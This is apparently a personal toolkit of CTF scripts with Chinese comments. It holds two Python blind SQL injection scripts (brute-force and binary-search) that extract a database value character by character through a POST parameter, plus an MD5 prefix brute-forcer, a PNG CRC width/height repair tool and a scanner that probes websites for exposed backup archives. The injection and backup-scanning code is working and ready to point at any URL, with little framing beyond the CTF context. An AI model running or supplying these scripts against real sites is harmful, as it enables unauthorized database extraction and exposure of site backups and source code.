POST盲注（暴力)

from requests import *
import time
url = ''
payload = {"id" : ""}
flag = ""
for i in range(1,10000000000):#flag长度
    time.sleep(0.06)
    for j in range(20, 126):#可见字符ascii范围
        payload["id"] = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),1,0)".format(i, j)
        now = post(url, payload)
        time.sleep(0.04)
        if "Hello" in now.text:#Hello改为回显信息
            print(i)
            flag += chr(j)
            print(flag)
            break 

POST盲注（二分）

from requests import *
import time
url = ""
payload = {"id" : ""}
flag = ""
for i in range(1,200):#这里调多大都不会有影响，应为判断结束的条件是用空格判断的     
    time.sleep(0.06)    
    l = 20; r = 126; mid = (l + r) // 2            
    while(l < r):
        payload["id"] = "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
        res = post(url,payload)
        time.sleep(0.04)
        # print(payload)
        if "Hello" in res.text:l = mid + 1#Hello改为回显信息
        else:r = mid
        mid = (l + r) // 2
    if(chr(mid) == " "):break
    flag  += chr(mid)
    print(flag)
print("flag: " ,flag)

MD5碰撞

import requests
import base64
import sys
import hashlib
 
def getMd5(index):
	for i in range(100000,100000000):
		x = i
		md5 = hashlib.md5(str(x).encode("utf8")).hexdigest()
		if md5[0:6] == index:
			return x
a = input() # 需要碰撞的md5
print(getMd5(a))

CRC修复

import zlib
import struct
import argparse
import itertools


parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下图片的名称")
args  = parser.parse_args()


bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc


if crc32key == original_crc32: # 计算crc对比原始crc
    print('宽高没有问题!')
else:
    input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        exit()
    else: 
        for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF，但考虑到屏幕实际/cpu，0x 0F FF就差不多了，也就是4095宽度和高度
            data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
            crc32 = zlib.crc32(data)
            if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值，与图片中的CRC比较，当相同，则图片大小已经确定
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"宽度: {i}, hex: {hex(i)}")
                print(f"高度: {j}, hex: {hex(j)}")
                exit(0)

Web敏感目录扫描

import requests
import time
print("网址：")

url = input()

li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'index.php']
li2 = ['tar', 'tar.gz', 'zip', 'rar', 'swp']
for i in li1:
    for j in li2:
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(i+'.'+j)
        print(r)
        time.sleep(1)